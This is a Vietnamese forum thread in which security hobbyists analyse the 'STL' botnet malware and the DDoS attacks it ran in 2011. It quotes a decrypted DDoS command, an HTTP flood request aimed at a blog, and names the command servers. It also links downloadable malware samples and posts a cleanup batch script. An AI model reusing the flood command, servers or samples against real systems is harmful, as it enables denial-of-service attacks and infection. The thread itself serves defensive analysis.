http://www.mediafire.com/?bdl5qgxbrd9aet3 Bác kiểm tra giùm! Thanks!

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn sacroyant: file cậu úp là file GoogleCrashHandler.pf, tức file prefetch cache của GoogleCrashHandler.exe. Phải là đuôi .exe nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

sacroyant — GMT

TQN wrote:

Cảm ơn sacroyant: file cậu úp là file GoogleCrashHandler.pf, tức file prefetch cache của GoogleCrashHandler.exe. Phải là đuôi .exe nhé !

Sorry bác, tôi không nhìn kỹ chỗ bác bôi đỏ. Máy của tôi có cài chrome nhưng không tìm thấy file GoogleCrashHandler.exe.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Theo ý kiến của em, nếu được ai đó nên viết 1 tool remove cái đống "meo què" này, sau đó anh conmale viết 1 bài (kiểu bài báo) để mọi người đem phổ biến ở các website, forum. Nếu may mắn hơn 1 trang báo nào đó (vnexpress, vietnamnet, ...) đăng tin thì càng tốt nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

sonngh — GMT

vndncn wrote:

Lam sao submit cac mau virus cua anh TQN len cac trang antivirus vay ban, chi dum minh cach up voi? Cam on.

vào các link bên dưới nhiều người gởi mẫu độ tin cậy càng cao . Avira : http://analysis.avira.com/samples/index.php KIS : http://support.kaspersky.com/virlab/helpdesk.html Microsoft Security Essentials : https://www.microsoft.com/security/portal/Submission/Submit.aspx

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vài lời gởi mấy anh stl:

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nIf-Modified-Since: Fri, 12 Aug 2011 01:02:42 GMT\r\nIf-None-Match: "8452d86a-81ad-0731-a96e-83ce185a840d"\r\nReferer: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html http://danlambaovn.blogspot.com

Đây là 1 dòng config trong file http://net.iadze.com/showthread.php để DDOS, dùng con bot nằm vùng SbieMgm.dll. File showthread.php mới được mấy anh up lên webserver ngày 19-08-2011, 6:43PM. Sau khi ông nội ThangCuAnh tung cái tool để decode file backgrounds.jpg: DecodeJPG.exe lên mediafire, mấy anh nghĩ: đx, tiêu rồi, mình muốn đốt thằng nào, nó biết hết. Thôi, hy sinh thằng backgrounds.jpg đi, cứ để nó nằm đó trên net.iadze.com, nghi binh mà. Mình đặt thêm cái showthread.php mới để chứa mệnh lệnh DDOS. Lần này tao dùng mã hoá xxx gì đó của thư viện CryptoPP luôn, coi ThangCuAnh giãi mã ra không ? Hi hi, chết mày nhé ThangCuAnh, cho mày khóc tiếng Mán luôn. File ra lệnh đốt (hay "chích")) là file text, mấy anh làm như sau: a.txt -> a.gz -> mã hoá = crypto gì đó (em không quan tâm) -> thành showthread.php, up lên: http://net.iadze.com/showthread.php. Khi SbieMgm.dll run, nó download showthread.php về, giãi mã trên memory -> thành a.gz -> lưu xuống %Temp% -> gzunzip nó ra thành a.txt -> đọc lại a.txt -> delete a.txt và a.gz. Hì hì, giờ mấy anh thấy chổ "bị lũng" của mấy anh chưa ? Ông nội ThangCuAnh đặt breakpoint hay hàm API DeleteFileW, run luôn để SbieMgm.dll của mấy anh muốn múa gì thì múa =)). Khi breakpoint read, ThangCuAnh nhảy qua thư mục %Temp%, move hai cái file a.gz và a.txt đó qua chỗ khác (thực ra là xxx.tmp files), xong terminate debug process. Vậy là xong, mệnh lệnh "đốt" của mấy anh sờ sờ ra đó, chỉ cần notepad là đủ xem rồi. Em đã nói và góp ý mấy anh stl coder bao nhiêu lần, unzip mà cứ ghi xuống %temp% để unzip là tiêu rồi. Học lại các hàm của zlib đi, nói hoài :-( Hôm nay, cái link "đốt" danlambaovn.blogspot.com trên đã phần nào nói lên mấy anh là ai rồi. Link đầy đủ đây: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html Thay vì static analysic để viết tool decode, giờ ThangCuAnh nói với em, nó lười, chán RCE code mấy anh rồi, chơi dynamic analysic luôn cho nhanh.

Phân tích tính chất vài trận DDoS HVA vừa qua.

sgdo — GMT

Gửi bạn TQN file GoogleCrashHandler.exe http://www.mediafire.com/?mqqyhp6ubfp3em6

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn bạn sgdo (tên bạn giống bia Sài gòn đỏ vậy). File bạn đã gởi là file sạch. Bạn xem lại post của tôi ở trang 18 để kiểm tra nhé. Hướng dẫn debug và lấy nội dung file showthread.php của stl bằng OllyDbg Mở file SbieMgm.dll mà tôi đã up lên mediafire, trong file FakeSandboxie_17_08_2011.zip: http://www.mediafire.com/?5w2rrwd08b8bg8r bằng OllyDbg, ver nào cũng được. Đặt breakpoint tại DeleteFileW (không cần đặt breakpoint cho DeleteFileA vì DeleteFileA cũng phải call DeleteFileW). Cho an toàn, đặt thêm breakpoint cho CreateProcessW. Sau đó, các bạn run (F9 hay g).

Khi OllyDbg break tại DeleteFileW, nhìn vào cửa sổ stack, các bạn sẽ thấy file xxx.tmp. Trên máy tôi, %Temp% là C:\Temp. Khoan F9, các bạn nhảy qua Explorer, chép cái file xxx.tmp đó qua chỗ khác. Xong chưa, rồi thì F9.

OllyDbg sẽ break lần 2, và trong cửa sổ stack, các bạn sẽ thấy 1 file xxx.tmp nữa. Tương tự, chép nó qua chổ khác, terminate OllyDbg, không cần debug nữa.

Trong hai file .tmp đó, có 1 file nhỏ và 1 file lớn, 1k và 4k. Dùng notepad mở file 4k lên, sẽ thấy nội dung "đốt chích" của mấy anh stl.

Mở file xxx.tmp nhỏ 1k với WinRAR, 7Zip hay WinZip cũng sẽ thấy nội dung như file vừa mở = Notepad.

Vậy là xong, coder stl code cho cố, vẽ rồng vẽ phượng cho phức tạp, thì chúng ta chỉ cần break vài phát là lòi ra hết. Chia buồn mấy anh stl nhé :-( Rút kinh nghiệm, đừng đặt mình ở vị trí coder, hãy đặt mình vào vị trí cờ rắc cơ như ThangCuAnh :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, không dám đâu template. Mắc công mấy anh đó hùa nhau đập hội đồng là em tiêu luôn, bỏ vợ con + rau cỏ hết ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

He he, thangcuAnh thiệt là hài :-) . Anh cứ tưởng dân miền Trung mình thì khô khan lắm. Té ra không phải. Hổm bữa anh đã nói với mấy sư phụ stl rồi là có làm gì thì làm, đến một lúc nào đó cũng là cleartext nhưng hình như không xi nhê, thangcuAnh minh hoạ hình ảnh sống động quá, kiểu này mấy ảnh lại tìm cách khác. Mấy "ảnh" chơi trò xào nấu lung tung, rồi đẻ ra cái chuyện viết xuống tmp, đọc tmp, xoá tmp để giấu. Kể ra cũng có sáng tạo đó nhưng giấu cái gì? Sớm muộn gì mấy con zombies dùng để đập vietnamnet cũng lòi xì ra mà thôi. Mấy anh stl ráng đập cái google blog không biết để làm gì. Mấy anh tạo ra được bao nhiêu Gbit botnet mà cứ nhè danlambao mà đập không biết. Nhân tiện cảnh báo bà con coi chừng cửa nẻo, chìa khoá nhe bà con? Sắp sửa gần ngày lễ lớn, mấy stl chắc là chuẩn bị đánh "vài quả" để lập thành tích đây.

Phân tích tính chất vài trận DDoS HVA vừa qua.

levanduyet — GMT

TQN wrote:

Hì hì, không dám đâu template. Mắc công mấy anh đó hùa nhau đập hội đồng là em tiêu luôn, bỏ vợ con + rau cỏ hết ;)

Chào TQN, Tôi nghĩ sau sự việc này, hva cũng nên tổ chức những lớp như đề nghị ở trên nhằm phát triển đội ngũ phân tích giúp ngăn chặn việc tấn công Ddos sau này cho các trang mạng nói chung ở VN. (tôi cũng muốn tham gia...). LVD

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

levanduyet wrote:

TQN wrote:

Hì hì, không dám đâu template. Mắc công mấy anh đó hùa nhau đập hội đồng là em tiêu luôn, bỏ vợ con + rau cỏ hết ;)
Chào TQN, Tôi nghĩ sau sự việc này, hva cũng nên tổ chức những lớp như đề nghị ở trên nhằm phát triển đội ngũ phân tích giúp ngăn chặn việc tấn công Ddos sau này cho các trang mạng nói chung ở VN. (tôi cũng muốn tham gia...). LVD

"cái khó nó bó cái khôn" bạn để ý sẽ thấy không phải anh em HVA nào cũng full time giống như tụi STL được cả, việc RCE cũng đã chiếm quá nhiều thời gian của mấy bro đó rồi, + thêm HVA là 1 diễn đàn phi lợi nhuận nên việc tổ chức ra hẳng 1 lớp là điều rất khó. vụ việc STL tại sao mấy bro HVA phải đi theo bởi STL đã từng động tới HVA, va cũng động tới những thứ to hơn nữa đó là lòng tự tôn của con người nhất là người Việt Nam. Thực ra không cần phải thành lập lớp này lớp kia, mỗi thành viên HVA mỗi ngày chỉ cần bỏ 1h đồng hồ post cách phòng chống malware của anh TQN lên các forum mà mình biết, tham gia là được rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, lại nhờ vã nữa. Bà con nào ở trong nước và nước ngoài có bản BinDiff v3.x không http://www.zynamics.com/bindiff.html, private share cho em một bản với. Bản leak 2.0 em có rồi, nhưng do core của nó = Java nên chạy cực kỳ chậm, cái máy cùi của em nó đơ luôn. Còn PatchDiff và DarunGrim2 em đang dùng, hàng free, nên có bug và compare không chính xác và thiếu một số tính năng cần thiết. Giờ mà bỏ mấy ngày code thêm tính năng, fix bug thì "quãi" quá !

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

sonngh wrote:

vndncn wrote:

Lam sao submit cac mau virus cua anh TQN len cac trang antivirus vay ban, chi dum minh cach up voi? Cam on.
vào các link bên dưới nhiều người gởi mẫu độ tin cậy càng cao . Avira : http://analysis.avira.com/samples/index.php KIS : http://support.kaspersky.com/virlab/helpdesk.html Microsoft Security Essentials : https://www.microsoft.com/security/portal/Submission/Submit.aspx

Cảm ơn, mình đã submit rồi, nhưng không biết up có sai gì không nữa. Dear Sir or Madam, Thank you for your submission. Your tracking number is 807098. Please always state your tracking number if contacting support. This email is automatically generated. Please do not reply to it. At the time the result of the technical analysis is ready we will send a reply including results. Additionally you will be able to see it online here: http://analysis.avira.com/samples/details.php?uniqueid=8p5gphI11Ydy4IRxYOwTpZ1fpEjW0j8p&incidentid=807098 An overview of your previous submissions can be accessed here: http://analysis.avira.com/samples/details.php?uniqueid=8p5gphI11Ydy4IRxYOwTpZ1fpEjW0j8p Sincerely yours, Avira Virus Lab Response Team Hello, This message is generated by automatic letter reception system. The report contains information on what the verdicts on the files (if any in the letter) makes antivirus with latest updates. Letter will be passed to the virus analyst. If you are a licensed Kaspersky Lab customer, we recommend that you send the files to be scanned to the Virus Lab, using your profile: https://my.kaspersky.com/en/support/viruslab . This option is available for the Licensed Kaspersky Lab customers only. If you are not a Licensed Kaspersky Lab customer, please use the following link: http://support.kaspersky.com/virlab/helpdesk.html?LANG=en. This link sends your file to the Virus Lab for inspection. All the files submitted for scanning from unregistered addresses are verified in the common queue order. sbiesvc.exe This file is in process. Best Regards, Kaspersky Lab "10/1, 1st Volokolamsky Proezd, Moscow, 123060, RussiaTel./Fax: + 7 (495) 797 8700 http://www.kaspersky.com http://www.viruslist.com" Thank you for submitting suspicious file(s) to the Microsoft Malware Protection Center (MMPC). This email acknowledges that we have successfully received the following file(s) at Sunday, August 21, 2011 8:26 AM Pacific Time: File ======================================== SbieSvc.exe Your submission has been assigned ID MMPC11082119831261, you can view your submission at http://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=fb355812-8815-4bf3-8054-122d451228fa Please keep this email and ID for future reference. Customers who are logged into our portal when they submit the sample(s) can later check the status of the submitted file(s) by viewing their submission history page. The MMPC will analyze the file(s) that you submitted to determine if they contain malware or other potentially unwanted software. If any file(s) in your submission are identified as either, the MMPC will add detection and publish definition updates after testing and certification. ======================================== Additional Help For customers who do not have an antivirus solution, Microsoft Security Essentials can be downloaded at no charge here: http://www.microsoft.com/security_essentials/ Information about top threats and the most up-to-date definition updates for all of Microsoft's Security related products are available on the MMPC portal at: http://www.microsoft.com/security/portal/ Additional support options for IT professionals and home users are available at the following websites: For IT Professionals - http://support.microsoft.com/gp/securityitpro For Home Users - http://support.microsoft.com/default.aspx?pr=securityhome Thank you, Microsoft Malware Protection Center

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Thằng NIS2011 nó trả lời mình thế này: --------------------------------------------------------------------------- Developer Notes --------------------------------------------------------------------------- AcrobatUpdater.exe Our automation was unable to identify any malicious content in this submission. The file will be stored for further human analysis Bạn nào xài NIS2011 thì vào đây submit nha: https://submit.symantec.com/websubmit/retail.cgi Hi vọng càng nhiều người submit thì nó càng xem xét kĩ hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mấy anh stl này thiệt là, hook, modify device change của audio driver làm gì vậy, bộ máy victim nghe cái gì là phải share cho mấy anh nghe cùng à ? Lỡ máy em đang coi phim xxx :-) thì sao, mấy anh nghe không mà không thấy hình thì chịu sao nỗi, rồi làm sao làm việc được =)) Kỹ thuật code này cao thủ đấy, lần đầu tiên em mới gặp trong malwares, em khen thiệt tình đó ! RCE xong em sẽ post tiếp cho bà con học hỏi kỹ thuật coding này của mấy anh ! Trong thời gian chờ mẫu bot vietnamnet, lục lại mấy cái "mèo què" của mấy anh, RCE cho xong, thì mới phát hiện ra đấy chứ ! Thằng coder C++ của mấy anh cứ chơi CString, RCE khó chịu quá, nhưng không sao, em có thuốc trị rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Việc submit các mẫu virus-trojan của STL lên các international antivirus companies là điều cần thiết. Tuy nhiên nếu chúng ta có thể viết ra một Virus removal tool nhỏ để quét và diệt các STL virus- trojan trong hệ thống trong đó có AcrobatUpdater.exe, jarlib.dll (đi kèm với AcrobatUpdater.exe), SbieSvc.exe, SbieMgm.dl (đi kèm với SbieSvc.exe), MsHelpCenter.exe, ...............(đi kèm với MsHelpCenter.exe)... vân vân thì hay hơn và có dấu ấn của các chuyên gia bảo mật VN. Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance. Các file MsHelpCenter.exe, AcrobatUpdater.exe (newly modified) và SbieSvc.exe cần được gọi tên đúng là các "DDoS tool" được cài lén trong hệ thống, như các chuyên gia bảo mật quốc tế ở lĩnh vực này thường gọi như vậy(Khi submit tới các công ty antivirus ,xin dùng tên này để họ dễ nhận định). MsHelpCenter.exe đã đươc thử trên máy thử nghiệm của tôi, nhưng quá trình DDoS vào một mục tiêu nào đó không diễn ra. Lý do chưa được xác định. Đề nghị các bạn khác cùng tôi phối kiểm việc này. SbieSvc.exe (kèm với SbieMgm.dll) sắp được thử nghiệm trên máy của tôi. Có kết quả tôi sẽ thông báo cụ thể cho các bạn. -------- Riêng về file (process) của Trojan TRJ/hvadetec-1 (tức là newly revised AcrobatUpdater.exe) xin thông báo thêm một số thông tin bổ sung: 1- Sau khi tấn công vào webserver chính của HVA đặt tai Mỹ (website của HVA cùng hosting chung một webserver với tienve.org), TRJ/hvadetec-1 (AcrobatUpdater.exe) chuyển sang tấn công vào webserver mới của HVA, đặt tại Đức và sau cùng chuyển sang tấn công vào webserver thứ ba của HVA đặt tại Nhật. 2- Sở di STL DDoS tool tấn công vào các webserver khác nhau của HVA là do HVA đã chủ đông áp dụng kỹ thuật Round- robin (RR) DNS, để phân tải theo thời gian cho các webserver. Không phải là kỹ thuật mới, mà STL vừa áp dụng cho DDOS tool họ đâu! 3- Nhịp độ tấn công của STL DDoS tool trên một máy cũng khá nhanh và mạnh, có thể từ 4-10 kết nối trong một giây (tuỳ theo cấu hình máy mạnh hay yếu). Các gói tin DDoS tấn công vào mục tiêu đều là SYN packet, có dung lượng khoảng 62 Bytes. Tuy nhiên thưc tế trên mạng không có nhiều máy tham gia vào quá trình cùng DDoS vào HVA. Có nhiều lý do, trong đó có lý do là mạng bot của STL đã tổn thất nhiều và STL nhiều lúc đã mất khả năng điều khiển chúng. 4- Sau một thời gian hoat động (tấn công DDoS vào mục tiêu) các DDoS tool của STL (AcrobatUpdater.exe) dễ dàng rơi vào trạng thái "Loopback". Điều này xuất phát từ "lỗi kỹ thuật" rõ ràng trong quá trình biên soạn (code) process này. Ngoài ra TRJ/hvadetec-1 (AcrobatUpdater.exe) khi chạy chiếm một năng lưc rất lớn của CPU (khoảng từ 15-45 %- rất nhiều lúc là 42%). Do vậy khi user khởi phát một service khác, thí dụ xem video trên mạng hay quét virus hệ thống, thì tốc độ DDoS của AcrobatUpdater.exe chậm hẳn lai hoăc temporarily stopped. 5- TRong quá trình DDoS, TRJ/hvadetec-1 có kết nối với một webserver của STL để được update dữ liệu. Đó chính là webserver high.paploz.com mà anh TQN đã phát hiện trong quá trình RCE file AcrobatUpdater.exe, chứ không phải là http://net.iadze.com. Socket kết nôi đến cổng 80 TCP HTTP của webserver trên để download về máy nạn nhân file xv.jpg (xem hình minh hoạ). Trên máy thử nghiệm của tôi kết nối này xảy ra vào ngày 21-8-2011 (chủ nhật), nhưng khi kiểm tra file này trên máy và kiểm tra file xv.jpg này download từ high.paploz.com vào sáng hôm nay (22-8), thì khi mở ra nôi dung file này vẫn còn là: "2011-08-18 15:22:46" Đây là triệu chứng rõ ràng STL đã bối rối và mất dần quyền điều khiển mang bot của họ Xin xem thêm các hình minh hoạ: Tấn công DDoS vào webserver của HVA tại Đức

Tấn công DDoS vào webserver của HVA tại Nhật

TRJ/hvadetec-1 (AcrobatUpdater.exe) kết nối với high.paploz.com

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

Em thử vào link dưới, link này có trong lúc anh TQN RCE và detect thì được báo như bên dưới, hổng lẻ IP của em bị chặn vì phát hiện có có truy vấn tới blog này trước đây. và nếu như vậy thật thì hổng lẻ 1 trong những cái máy của chỗ e dính virus của STL. mấy cho cho thêm ý kiến nhé. Thanks ah ! Code:

http://www.google.com/sorry/misc/?continue=http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html

Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen? IP address: 113.xxx.xxx.xxx Time: 2011-08-22T07:07:53Z URL: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

superbmt — GMT

lúc sáng e vào xem trang này bình thường..nhưng giờ vào lại cũng bị giống bạn oOo ở trên..mong các bác cho e cách fix.

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

Hay là các IP của VN bị lock hết rùi

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

Hình như danlambaovn DIE rồi thì phải : Oops! Google Chrome could not connect to danlambaovn.blogspot.com Trong khi đó vào blogspot.com thì vẫn BT

Phân tích tính chất vài trận DDoS HVA vừa qua.

superbmt — GMT

ivanst wrote:

Hình như danlambaovn DIE rồi thì phải : Oops! Google Chrome could not connect to danlambaovn.blogspot.com Trong khi đó vào blogspot.com thì vẫn BT

e ko biết có die ko nhưng e vào danlambao thì ko được bác ạ, còn vào cái Blogspot.com của e thì lại được, ko biết là thế nào nhỉ...e nghĩ danlambao khó die lắm..chắc có khi disable thôi..

Phân tích tính chất vài trận DDoS HVA vừa qua.

XNoname01 — GMT

o.O.o wrote:

Hay là các IP của VN bị lock hết rùi

Vào bình thường mà bạn. Lỗi xảy ra do IP của bạn đang DDoS danlambaoxxx nên google chặn IP thôi. Mà VN xài IP chung nhiều nên đôi lúc máy bạn bị oan thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

superbmt — GMT

XNoname01 wrote:

o.O.o wrote:

Hay là các IP của VN bị lock hết rùi
Vào bình thường mà bạn. Lỗi xảy ra do IP của bạn đang DDoS danlambaoxxx nên google chặn IP thôi. Mà VN xài IP chung nhiều nên đôi lúc máy bạn bị oan thôi.

đúng vậy, e thật là ngu..hxhx..e đổi sang dãy địa chỉ IP khác là vẫn vào được?? có thể do 1 trong các dãy e đã dùng gần giống với dãy bị chặn nên bị chặn...tưởng máy bị nhiễm "mèo què" của STL..hxhx

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Google chặn theo dải IP, đặc biệt là IP của VNPT, tình trạng này đc gần 2 tuần nay rồi. Tất nhiên có nhả ra, nhưng ko nhanh. Cũng là 1 dụng ý của STL, để hạn chế độc giả truy cập các blog "lề trái" *.blogspot.com :) Tuy nhiên các doanh nghiệp xài Mail host Google thì hơi phiền :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Chắc có lẽ đây cũng là một chủ ý của stl. DDOS không được thì "bố mày" khỏi vào xem luôn. Thâm hiểm thật ! Em bỏ code lâu quá rồi, giờ code như gà mổ, nên ngại code tool remove stl "mèo què". Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ??? Vì mấy con mèo què này của stl rất dể diệt, chỉ cần vài tool có sẵn của Windows là diệt được ngay, nên em mạn phép gõ gõ vài dòng bat để "tiêu diệt" mấy con mèo què này, khỏi cần dùng dao mổ trâu để giết gà, trong khi chờ đợi các tool "bờ rồ" của các AVs. Bà con down file killstlmeoque.cmd ở đây: http://www.mediafire.com/?z3atx20ilxpebop. Run nó, đừng hỏi em là run làm sao thì em bó tay luôn. Bat file này chỉ dùng lệnh dir, rd, del, tool reg.exe, sc.exe, taskkill.exe. Hầu như là có sẵn trên mọi máy hết. Text nó ở đây nếu các bạn down không được, chịu khó copy-paste-save nhé Code:

@echo off
echo ==========================================================================
echo Bat file to Kill some "meo que" of "song chet theo lenh" hec-co "lost-hat"
echo Code "bay ba cho vui" by ThangCuAnh - HVA
echo Ba con test, modify, bo sung thoa mai - No copyright
echo ==========================================================================

:Repeat

echo.
echo Kill and delete AcrobatUpdater.exe
echo.

taskkill /F /IM AcrobatUpdater.exe /T

dir "%AppData%\AcrobatUpdater.exe" /b /s
del "%AppData%\AcrobatUpdater.exe" /F /S
del "%AppData%\jarlib.dll" /F /S
rd  "%AppData%\Adobe\Updater6" /s /q

dir "%ProgramFiles%\AcrobatUpdater.exe" /b /S
del "%ProgramFiles%\AcrobatUpdater.exe" /F /S
del "%ProgramFiles%\jarlib.dll" /F /S
rd  "%ProgramFiles%\Adobe\Updater6" /s /q

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Acrobat Reader and Acrobat Manager" /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Acrobat Reader and Acrobat Manager" /f

echo.
echo Kill and delete SbieSvc.exe and SbieMgm.dll
echo.

taskkill /F /IM SbieSvc.exe /T
sc delete SbieSvc

dir "%AppData%\SbieSvc.exe " /b /s
del "%AppData%\SbieSvc.exe" /F /S
dir "%AppData%\SbieSvc.exe " /b /s
del "%AppData%\SbieSvc.exe" /F /S

dir "%ProgramFiles%\SbieSvc.exe" /b /S
del "%ProgramFiles%\SbieSvc.exe" /F /S
dir "%ProgramFiles%\SbieMgm.dll" /b /S
del "%ProgramFiles%\SbieMgm.dll" /F /S

reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ALG /v Version /f

echo.
echo Kill and delete TeamViewer.exe, TeamViewer_Desktop.exe, uxtheme.manifest, themeui.manifest
echo.

taskkill /F /IM TeamViewer.exe /T
taskkill /F /IM TeamViewer_Desktop.exe /T

del "%ProgramFiles%\TeamViewer.exe" /F /S
del "%ProgramFiles%\uxtheme.manifest" /F /S

del "%ProgramFiles%\TeamViewer_Desktop.exe" /F /S
del "%ProgramFiles%\themeui.manifest" /F /S

del "%SystemDrive%\Program Files (x86)\TeamViewer.exe" /F /S
del "%SystemDrive%\Program Files (x86)\TeamViewer_Desktop.exe" /F /S

del "%WinDir%\uxtheme.manifest" /F /S
del "%WinDir%\themeui.manifest" /F /S

echo.
echo Press Ctrl-C to terminate & pause
goto Repeat

Em chỉ nghĩ đâu viết đó, test "sơ sơ", chưa kiểm tra errorlevel trả về, nên nó cứ cấm đầu cấm cổ chạy miệt mài, khi nào muốn thôi thì Ctrl-C. Xem kỹ các output xuất ra của nó nhé. Nghĩ cũng buồn cho mấy anh stl, nhân lực vậy, tiền bạc vậy, công sức bỏ ra biết bao nhiêu, vậy mà cuối cùng bị một cái bat file "tệ hơn vợ thằng Đậu" của ThangCuAnh vô danh nào đó, ở nơi khỉ ho cò gáy kill tất tần tật hết :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

angel_of_devil wrote:

Google chặn theo dải IP, đặc biệt là IP của VNPT, tình trạng này đc gần 2 tuần nay rồi. Tất nhiên có nhả ra, nhưng ko nhanh. Cũng là 1 dụng ý của STL, để hạn chế độc giả truy cập các blog "lề trái" *.blogspot.com :) Tuy nhiên các doanh nghiệp xài Mail host Google thì hơi phiền :P

nghe bạn nói mình mới nhớ.2 ngày nay mail cua mình gửi cho địa chỉ gmail khùng khùng lắm lúc được lúc không. ps:tớ vẫn vào được các bác ah http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ờ mà quên, chiều giờ vừa theo dõi giá vàng nhảy disco, vừa viết bat, vừa rce con exe giả doc của mấy anh stl, phát hiện một điều lý thú, nói luôn cho bà con: Bà con cẩn thận khi voice chat với em út bằng Yahoo, IM, Skype... Lỡ anh em nào hẹn họ em út đi KS thì cẩn thận, coi chừng mấy anh stl nghe hết và ập vào đấy. Nếu không (hay chưa) có gì thì mấy anh sẽ bonus cho 2 bao OK (đã xài rồi chứ có được bao mới đâu) là cũng tiêu mấy anh em luôn đấy. Hì hì ! Chơi bẩn, chơi xấu thiệt. stl coder dùng kỹ thuật hook voice này theo tui để chặn và lấy các file âm thanh mà nhiều người "lề trái" thu âm để up lên RFA, BBC...

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

YM, MSN thì ko nói, nhưng e nghĩ Skype có mã hoá mà anh?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Chắc có lẽ đây cũng là một chủ ý của stl. DDOS không được thì "bố mày" khỏi vào xem luôn. Thâm hiểm thật ! Bà con down file killstlmeoque.cmd ở đây: http://www.mediafire.com/?z3atx20ilxpebop. Run nó, đừng hỏi em là run làm sao thì em bó tay luôn. Bat file này chỉ dùng lệnh dir, rd, del, tool reg.exe, sc.exe, taskkill.exe. Hầu như là có sẵn trên mọi máy hết. Text nó ở đây nếu các bạn down không được, chịu khó copy-paste-save nhé ............................................

Hoan hô TQN Thưc ra cái công lớn ở đây là việc TQN tìm ra các file DDoS tool của STL. Chứ việc viết một STL Virus Removal tool thì không phải là khó hay công lao to tát gì. Nhưng nếu viết quen (như các bác ở BKAV hay CMC) thì viết nhanh và đủ hơn. Ngoài ra có một điểm lưu ý là nếu chỉ đơn thuần delete ngay các process hay file AcrobatUpdater.exe thôi thì hình như không được. Phải có thêm đông tác "ngắt" trước các kết nối của nó với các file và service khác ( như kiểu unlocker.exe làm ấy). Và sau đó phải cần reboot lai máy (vì AcrobatUpdater.exe luôn được load lên bộ nhớ của máy). Chắc các file (process) MsHelpCenter.exe cũng như vậy. Nên chắc TQN phải bổ sung thêm vài codes nữa

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

TQN wrote:

Ờ mà quên, chiều giờ vừa theo dõi giá vàng nhảy disco, vừa viết bat, vừa rce con exe giả doc của mấy anh stl, phát hiện một điều lý thú, nói luôn cho bà con: Bà con cẩn thận khi voice chat với em út bằng Yahoo, IM, Skype... Lỡ anh em nào hẹn họ em út đi KS thì cẩn thận, coi chừng mấy anh stl nghe hết và ập vào đấy. Nếu không (hay chưa) có gì thì mấy anh sẽ bonus cho 2 bao OK (đã xài rồi chứ có được bao mới đâu) là cũng tiêu mấy anh em luôn đấy. Hì hì ! Chơi bẩn, chơi xấu thiệt. stl coder dùng kỹ thuật hook voice này theo tui để chặn và lấy các file âm thanh mà nhiều người "lề trái" thu âm để up lên RFA, BBC...

Cái này anh TQN phát hiện đáng giá lắm đấy nhé....người "lề trái" nên cẩn thận đề phòng..

angel_of_devil wrote:

YM, MSN thì ko nói, nhưng e nghĩ Skype có mã hoá mà anh?

Ghi hết bạn ahj....YM, MSN hay Skype gì thì trên local PC cũng bị ghi hết cả (ví dụ đơn giản là có nhiều chương trình Recorder cho YM,MSN hay Skype đấy thôi.)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

